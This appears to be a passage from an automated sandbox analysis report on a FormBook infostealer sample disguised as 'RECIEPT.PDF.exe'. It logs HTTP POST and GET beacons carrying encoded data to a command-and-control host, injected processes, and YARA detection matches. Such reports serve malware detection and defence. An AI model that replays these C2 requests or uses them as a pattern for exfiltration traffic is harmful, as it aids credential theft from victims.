                                      Sep 22, 2024 17:39:13.648787975 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:39:13 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                      Sep 22, 2024 17:39:13.648842096 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                      Sep 22, 2024 17:39:13.648880959 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                      Sep 22, 2024 17:39:13.648984909 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                      Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      51192.168.2.1249769194.58.112.174804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:39:16.167314053 CEST1880OUTPOST /1c4z/ HTTP/1.1
                                      Host: www.albero-dveri.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.albero-dveri.online
                                      Referer: http://www.albero-dveri.online/1c4z/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6a 46 66 49 55 57 2b 63 43 58 50 48 71 79 45 41 31 66 33 67 4a 35 72 69 5a 36 65 67 68 74 6f 54 6a 37 37 61 35 59 54 6a 6a 4e 68 31 4d 38 6a 76 4c 4e 57 5a 6d 39 56 6b 42 4e 54 6e 31 4d 78 72 52 78 39 39 73 47 54 69 2b 63 69 47 67 32 2f 36 65 4b 70 58 74 6a 54 38 7a 64 42 67 55 33 4e 6d 4d 79 65 57 4b 64 67 6d 38 57 77 71 4c 6e 57 45 56 51 67 47 71 30 79 58 57 7a 4e 31 4b 31 69 68 78 37 6e 66 52 62 63 65 74 6f 4b 32 57 73 7a 32 7a 6b 68 62 6b 4a 39 70 62 65 2b 4f 4f 57 63 4e 37 31 37 75 2b 58 4d 45 36 37 5a 6b 4b 74 34 6e 65 66 61 49 33 48 62 45 70 5a 42 75 54 4a 36 58 50 69 44 50 71 43 32 55 76 37 32 30 43 4e 75 62 64 6b 74 6f 36 6b 4a 62 57 6c 67 7a 76 2f 4d 2f 2b 4e 35 2f 6f 30 4d 46 31 36 4c 4c 57 37 4b 39 52 56 70 61 31 49 71 77 68 63 4b 58 38 52 2f 57 31 46 64 46 6c 64 78 62 6a 58 79 48 6e 71 39 6a 56 74 34 71 6a 67 51 64 72 43 42 74 32 59 72 51 4f 46 33 44 56 51 45 65 4c 73 7a 4b 76 41 79 6b 4a 65 59 46 39 77 64 66 6a 71 66 30 6e 5a 68 66 71 6c 36 36 31 53 33 2b 72 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=jFfIUW+cCXPHqyEA1f3gJ5riZ6eghtoTj77a5YTjjNh1M8jvLNWZm9VkBNTn1MxrRx99sGTi+ciGg2/6eKpXtjT8zdBgU3NmMyeWKdgm8WwqLnWEVQgGq0yXWzN1K1ihx7nfRbcetoK2Wsz2zkhbkJ9pbe+OOWcN717u+XME67ZkKt4nefaI3HbEpZBuTJ6XPiDPqC2Uv720CNubdkto6kJbWlgzv/M/+N5/o0MF16LLW7K9RVpa1IqwhcKX8R/W1FdFldxbjXyHnq9jVt4qjgQdrCBt2YrQOF3DVQEeLszKvAykJeYF9wdfjqf0nZhfql661S3+rDT/xoPEdrYzcrpW8p5wI+f/T1dFywx5BJp1QApe1pOqOUMiJs2ohRaz8RABechcliPIx8B8VuvFegycrRcVCGscwm1WI9W+4UciHy6EWZydiHm60r3tFkfAaiqgpOl5eIYmJUwh2Icv99nELRacOi5bmg+JML4RrMO2MY0aOb9VmvaVh7XBYtx3blA1zrhfzO+vfx0FWAYuFqJpKrYNfVdUHZS2LmX5aZ+B9cHqt7iG2lYXSQpjuAjaz0uSIQG5cdpp4LWK61fC0+9U9DKqRzPOxxB4e9RD0GcDLyp04DOtRDJLpqQqjVSh7M93hX9GPWkvalgdzVMKf9jijZtc1ZdJ433ZIVGbmW5yyyh8O1PxQceCR8vvhEXRNRELPxoYAcKkJf8w3oMoTk8XjIkOMOeBfPxCohppH0pB4FCQ0YBSMHUq6FdBUqxkVj+NzRE1hje1qr/UKG1PAJcuKBW1dGCDbU8kLDuqAoUB56q6YCDAh8baI+U+khgrEtsfs0l6B12tEFhP52vKDX/4czYo+FWVTVEon7qmachgrc9+BvPxgy2jZIcVR4sCYbbZTDNODmoFKvPz7cIbc5bR24tbUHKpa6xi1vtfAvw3cyLgQmjGB9Kh7fDsT4+q4ynGyBqU1y/MVy7Mt9hRa+vKT0IbFEDP2oF4ytfCMop [TRUNCATED]
                                      Sep 22, 2024 17:39:16.625226021 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:39:16 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                      Sep 22, 2024 17:39:16.625276089 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                      Sep 22, 2024 17:39:16.625315905 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                      Sep 22, 2024 17:39:16.626461029 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                      Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      52192.168.2.1249770194.58.112.17480
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:39:20.035317898 CEST561OUTGET /1c4z/?Bz=dVmT&H2y4Q2Q8=uH3oXmCyKhv12wMg2v78JJzwEYn/lYgzhazO5KT2jZEQG/yNL9LDr+55JN6gx8V2Xj527gP6ldjWu2/TSaNc6Hf688ZwfSY5DkyVJYE+oT0rVFjFcCJAjhw= HTTP/1.1
                                      Host: www.albero-dveri.online
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:39:20.724322081 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:39:20 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                      Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                      Sep 22, 2024 17:39:20.724380016 CEST224INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                                      Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h
                                      Sep 22, 2024 17:39:20.724677086 CEST1236INData Raw: 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1
                                      Data Ascii: 1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_s
                                      Sep 22, 2024 17:39:20.724709034 CEST224INData Raw: 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e
                                      Data Ascii: mage b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none">
                                      Sep 22, 2024 17:39:20.724987984 CEST1236INData Raw: b0 d0 b4 d1 91 d0 b6 d0 bd d1 8b d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 66 65 61 74 75 72 65 73
                                      Data Ascii: &nbsp;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
                                      Sep 22, 2024 17:39:20.725213051 CEST1236INData Raw: 63 6c 61 73 73 3d 22 62 2d 70 72 69 63 65 5f 5f 61 6d 6f 75 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e 3e 20 3c 2f
                                      Data Ascii: class="b-price__amount">83&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong class=
                                      Sep 22, 2024 17:39:20.725251913 CEST448INData Raw: 81 d1 82 d1 80 d0 be d0 b9 d0 ba d0 b8 20 d0 b8 26 6e 62 73 70 3b d1 83 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 ba d0 b8 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d1 8b d1 85 20 d0 bc d0 be d0 b4 d1 83 d0 bb d0 b5
                                      Data Ascii: &nbsp; .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-site
                                      Sep 22, 2024 17:39:20.725286961 CEST1236INData Raw: 64 65 72 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0
                                      Data Ascii: der"><strong class="b-title b-title_size_large-compact"> .</strong><p class="b-text b-parking__promo-description"> &nbsp; &nbs
                                      Sep 22, 2024 17:39:20.725322008 CEST1236INData Raw: 73 70 6c 61 74 6e 79 79 2d 73 73 6c 2d 73 65 72 74 69 66 69 6b 61 74 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f
                                      Data Ascii: splatnyy-ssl-sertifikat?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-m
                                      Sep 22, 2024 17:39:20.725358009 CEST1236INData Raw: 20 27 26 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73
                                      Data Ascii: '&'; } else { links[ i ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } }
                                      Sep 22, 2024 17:39:20.731125116 CEST1236INData Raw: 78 74 20 3d 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 20 3d 20 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 20 74 65 78 74 20 29 3b 0a 20 20 20 20 20 20 20 20 20
                                      Data Ascii: xt = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none';


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:11:35:10
                                      Start date:22/09/2024
                                      Path:C:\Users\user\Desktop\RECIEPT.PDF.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\RECIEPT.PDF.exe"
                                      Imagebase:0x400000
                                      File size:1'347'819 bytes
                                      MD5 hash:7463E695421BDD0E02E74C7EF9D6610E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:11:35:18
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\RECIEPT.PDF.exe"
                                      Imagebase:0x200000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2668528829.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2672502009.0000000009340000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2667751467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2668528829.0000000005BE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:11:35:37
                                      Start date:22/09/2024
                                      Path:C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe"
                                      Imagebase:0x330000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4786140972.0000000005440000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4786140972.0000000004A40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:6
                                      Start time:11:35:39
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\Robocopy.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\Robocopy.exe"
                                      Imagebase:0xe30000
                                      File size:131'072 bytes
                                      MD5 hash:0A1AA3D138103ED9FB645F6B02E41A2F
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4786145340.0000000000D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4785054464.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4779996297.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:false

                                      Target ID:7
                                      Start time:11:35:53
                                      Start date:22/09/2024
                                      Path:C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe"
                                      Imagebase:0x330000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
